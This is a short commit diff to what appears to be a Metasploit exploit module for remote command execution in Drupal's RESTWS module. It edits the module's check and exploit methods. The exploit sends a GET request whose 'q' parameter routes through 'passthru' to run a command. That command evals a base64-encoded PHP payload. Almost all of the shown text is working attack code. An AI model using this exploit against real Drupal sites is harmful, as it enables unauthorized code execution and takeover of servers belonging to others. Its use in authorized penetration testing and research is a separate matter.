Remove random string from URI

mdisec · mdisec · commit b0a05446275c · 2016-07-20T20:50:10.000+03:00
diff --git a/modules/exploits/unix/webapp/drupal_restws_exec.rb b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -59,7 +59,7 @@ def check
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, "index.php"),
       'vars_get' => {
-        'q' => "taxonomy_vocabulary/#{r}/passthru/echo #{r}"
+        'q' => "taxonomy_vocabulary//passthru/echo #{r}"
       }
     )
     if res && res.body.include?(r)
@@ -69,13 +69,12 @@ def check
   end
 
   def exploit
-    random = rand_text_alpha(1 + rand(2))
     cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
     send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, "index.php"),
       'vars_get' => {
-        'q' => "taxonomy_vocabulary/#{random}/passthru/#{cmd}"
+        'q' => "taxonomy_vocabulary//passthru/#{cmd}"
       }
     )
   end

Original file line number	Diff line number	Diff line change
`@@ -59,7 +59,7 @@ def check`
`59`	`59`	`'method' => 'GET',`
`60`	`60`	`'uri' => normalize_uri(target_uri.path, "index.php"),`
`61`	`61`	`'vars_get' => {`
`62`		`- 'q' => "taxonomy_vocabulary/#{r}/passthru/echo #{r}"`
	`62`	`+ 'q' => "taxonomy_vocabulary//passthru/echo #{r}"`
`63`	`63`	`}`
`64`	`64`	`)`
`65`	`65`	`if res && res.body.include?(r)`
`@@ -69,13 +69,12 @@ def check`
`69`	`69`	`end`
`70`	`70`
`71`	`71`	`def exploit`
`72`		`- random = rand_text_alpha(1 + rand(2))`
`73`	`72`	`cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"`
`74`	`73`	`send_request_cgi(`
`75`	`74`	`'method' => 'GET',`
`76`	`75`	`'uri' => normalize_uri(target_uri.path, "index.php"),`
`77`	`76`	`'vars_get' => {`
`78`		`- 'q' => "taxonomy_vocabulary/#{random}/passthru/#{cmd}"`
	`77`	`+ 'q' => "taxonomy_vocabulary//passthru/#{cmd}"`
`79`	`78`	`}`
`80`	`79`	`)`
`81`	`80`	`end`